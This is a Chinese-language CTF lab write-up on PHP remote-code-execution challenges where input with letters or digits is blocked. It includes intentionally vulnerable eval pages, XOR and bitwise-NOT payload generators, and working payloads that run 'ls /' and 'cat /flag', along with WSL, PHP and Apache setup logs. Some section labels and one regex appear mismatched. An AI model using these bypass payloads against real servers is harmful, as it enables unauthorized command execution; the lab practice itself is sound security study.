RCE的CTF题目环境和做题复现第4集
1 通过wsl的ubuntu环境部署
2 题目
2.1 http://localhost/rce3/rce3_1.php
<?php
highlight_file(__FILE__); // 高亮显示当前文件代码
if(!preg_match('/[a-z0-9]~/is', $_GET['code'])) { // 检查 `code` 参数是否包含字母或数字或取反eval($_GET['code']); // 如果没有字母或数字或取反,则执行 `code` 参数的内容
}
?>2.2 http://localhost/rce3/rce3_2.php
<?php
highlight_file(__FILE__); // 高亮显示当前文件代码
if(!preg_match('/[a-z0-9]/\^is', $_GET['code'])) { // 检查 `code` 参数是否包含字母或数字或异或eval($_GET['code']); // 如果没有字母或数字或异或,则执行 `code` 参数的内容
}
?>
2.3 http://localhost/rce3/rce3_3.php
<?php
highlight_file(__FILE__); // 高亮显示当前文件代码
if(!preg_match('/[a-z0-9]/is', $_GET['code'])) { // 检查 `code` 参数是否包含字母或数字eval($_GET['code']); // 如果没有字母或数字,则执行 `code` 参数的内容
}
?>
2
3 EXP
3.1.1 无字母数字取反RCE
3.1.2 使用xor.py构造pyload
system-> ("((%-<br>[[[\@@ -> " (\"((%-"^"[[[\@@"
cat-> #!(<br>@@\ -> "#!("^"@@\"
flag-> &,!'<br>@@@@ -> "&,!'"^"@@@@"
<?php
error_reporting(0);
$shell = "system";
$result1 = "";
$result2 = "";
for($num=0;$num<=strlen($shell);$num++)
{for($x=33;$x<=126;$x++){if(judge(chr($x))){for($y=33;$y<=126;$y++){if(judge(chr($y))){$f = chr($x)^chr($y);if($f == $shell[$num]){$result1 .= chr($x);$result2 .= chr($y);break 2;}}}}}
}
echo $result1;
echo "<br>";
echo $result2;function judge($c)
{if(!preg_match('/[a-z0-9]/is',$c)){return true;}return false;
}
3.1.3 ?code=(“(”((%-““[[[@@”)((“%23!(””@@\“).”%20/“.(”%26,!'“^”@@@@"));
?code=("(\"((%-"^"[[[\@@")(("%23!("^"@@\\")."%20/".("%26,!'"^"@@@@"));
3.2.1 无字母数字异或RCE
3.2.2 使用qufan.py构造pyload
<?php
echo urlencode(~"system");
echo "\n";
echo urlencode(~"ls /");
//(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);
echo "\n";
echo urlencode(~"system");
echo "\n";
echo urlencode(~"cat /flag");
//(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);
3.2.3
?code=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);
3.2.4
?code=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);
3.3 无字母数字RCE
可用上面2种方法解决
切换php7.1
(base) gpu3090@DESKTOP-8IU6393:/$ sudo apt-get install php7.1
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:libapache2-mod-php7.1 libpcre3 php7.1-cli php7.1-common php7.1-json php7.1-opcache php7.1-readline
Suggested packages:php-pear
The following NEW packages will be installed:libapache2-mod-php7.1 libpcre3 php7.1 php7.1-cli php7.1-common php7.1-json php7.1-opcache php7.1-readline
0 upgraded, 8 newly installed, 0 to remove and 2 not upgraded.
Need to get 3997 kB of archives.
After this operation, 15.0 MB of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://archive.ubuntu.com/ubuntu noble/universe amd64 libpcre3 amd64 2:8.39-15build1 [248 kB]
Get:2 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-common amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [579 kB]
Get:3 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-json amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [19.4 kB]
Get:4 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-opcache amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [164 kB]
Get:5 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-readline amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [13.4 kB]
Get:6 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-cli amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [1489 kB]
Get:7 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 libapache2-mod-php7.1 amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [1418 kB]
Get:8 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1 all 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [66.0 kB]
Fetched 3997 kB in 55s (73.2 kB/s)
Selecting previously unselected package libpcre3:amd64.
(Reading database ... 43387 files and directories currently installed.)
Preparing to unpack .../0-libpcre3_2%3a8.39-15build1_amd64.deb ...
Unpacking libpcre3:amd64 (2:8.39-15build1) ...
Selecting previously unselected package php7.1-common.
Preparing to unpack .../1-php7.1-common_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-common (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-json.
Preparing to unpack .../2-php7.1-json_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-json (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-opcache.
Preparing to unpack .../3-php7.1-opcache_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-opcache (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-readline.
Preparing to unpack .../4-php7.1-readline_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-readline (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-cli.
Preparing to unpack .../5-php7.1-cli_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package libapache2-mod-php7.1.
Preparing to unpack .../6-libapache2-mod-php7.1_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1.
Preparing to unpack .../7-php7.1_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_all.deb ...
Unpacking php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Setting up libpcre3:amd64 (2:8.39-15build1) ...
Setting up php7.1-common (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...Creating config file /etc/php/7.1/mods-available/calendar.ini with new versionCreating config file /etc/php/7.1/mods-available/ctype.ini with new versionCreating config file /etc/php/7.1/mods-available/exif.ini with new versionCreating config file /etc/php/7.1/mods-available/fileinfo.ini with new versionCreating config file /etc/php/7.1/mods-available/ftp.ini with new versionCreating config file /etc/php/7.1/mods-available/gettext.ini with new versionCreating config file /etc/php/7.1/mods-available/iconv.ini with new versionCreating config file /etc/php/7.1/mods-available/pdo.ini with new versionCreating config file /etc/php/7.1/mods-available/phar.ini with new versionCreating config file /etc/php/7.1/mods-available/posix.ini with new versionCreating config file /etc/php/7.1/mods-available/shmop.ini with new versionCreating config file /etc/php/7.1/mods-available/sockets.ini with new versionCreating config file /etc/php/7.1/mods-available/sysvmsg.ini with new versionCreating config file /etc/php/7.1/mods-available/sysvsem.ini with new versionCreating config file /etc/php/7.1/mods-available/sysvshm.ini with new versionCreating config file /etc/php/7.1/mods-available/tokenizer.ini with new version
Setting up php7.1-opcache (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...Creating config file /etc/php/7.1/mods-available/opcache.ini with new version
Setting up php7.1-readline (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...Creating config file /etc/php/7.1/mods-available/readline.ini with new version
Setting up php7.1-json (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...Creating config file /etc/php/7.1/mods-available/json.ini with new version
Setting up php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...Creating config file /etc/php/7.1/cli/php.ini with new version
Setting up libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...Creating config file /etc/php/7.1/apache2/php.ini with new version
libapache2-mod-php7.1: php7.3 module already enabled, not enabling PHP 7.1
Setting up php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Processing triggers for libc-bin (2.39-0ubuntu8.5) ...
Processing triggers for man-db (2.12.0-4build2) ...
Processing triggers for php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Processing triggers for libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
(base) gpu3090@DESKTOP-8IU6393:/$ php -v
PHP 7.3.33-24+ubuntu24.04.1+deb.sury.org+1 (cli) (built: Dec 24 2024 07:05:25) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.33, Copyright (c) 1998-2018 Zend Technologieswith Zend OPcache v7.3.33-24+ubuntu24.04.1+deb.sury.org+1, Copyright (c) 1999-2018, by Zend Technologies
(base) gpu3090@DESKTOP-8IU6393:/$ sudo update-alternatives --config php
There are 3 choices for the alternative php (providing /usr/bin/php).Selection Path Priority Status
------------------------------------------------------------0 /usr/bin/php7.4 74 auto mode1 /usr/bin/php7.1 71 manual mode
* 2 /usr/bin/php7.3 73 manual mode3 /usr/bin/php7.4 74 manual modePress <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/bin/php7.1 to provide /usr/bin/php (php) in manual mode
(base) gpu3090@DESKTOP-8IU6393:/$ php -v
PHP 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 (cli) (built: Dec 24 2024 06:50:54) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.1.0, Copyright (c) 1998-2018 Zend Technologieswith Zend OPcache v7.1.33-67+ubuntu24.04.1+deb.sury.org+1, Copyright (c) 1999-2018, by Zend Technologies
(base) gpu3090@DESKTOP-8IU6393:/$ sudo systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$ sudo a2enmod php7.1
Considering dependency mpm_prefork for php7.1:
Considering conflict mpm_event for mpm_prefork:
Considering conflict mpm_worker for mpm_prefork:
Module mpm_prefork already enabled
Considering conflict php5 for php7.1:
Enabling module php7.1.
To activate the new configuration, you need to run:systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$ systemctl restart apache2
Failed to restart apache2.service: Interactive authentication required.
See system logs and 'systemctl status apache2.service' for details.
(base) gpu3090@DESKTOP-8IU6393:/$ sudo systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$
4 部署环境
4.0.1 在wsl的ubuntu上安装php环境
Step 1: Remove Existing PHP Versions
First, let’s clean up any existing PHP 7.x installations:sudo apt-get purge php7.*
sudo apt-get autoclean
sudo apt-get autoremove
Note about these commands:autoclean removes obsolete package files from your cache
autoremove removes dependencies that are no longer needed
Using purge removes both packages and their configuration files
Step 2: Add the PHP Repository
Ondřej Surý maintains up-to-date PHP packages for Ubuntu:sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
Step 3: Install PHP 7.3
Now install PHP 7.3 and common extensions:sudo apt-get install php7.3
Step 4: Configure Apache (if using Apache)
If you’re using Apache as your web server:# Disable old PHP module (if any)
sudo a2dismod php7.0 # or whatever version you had before# Enable PHP 7.3
sudo a2enmod php7.3
sudo systemctl restart apache24.0.2 /var/www/html配置普通账户可读可写可执行权限
(base) gpu3090@DESKTOP-8IU6393:~$ chown gpu3090 /var/www/html
chown: changing ownership of '/var/www/html': Operation not permitted
(base) gpu3090@DESKTOP-8IU6393:~$ sudo chown gpu3090 /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ ls
M5-应用集成 anaconda3 cookies.txt downloads snap summaries tmpg00x95ve.mp3
(base) gpu3090@DESKTOP-8IU6393:~$
4.0.3 将题目代码和flag存放到/var/www/html/相应的位置
4.1 在vscode上运行上面的EXP的php脚本
需要安装插件php debug 和php Server
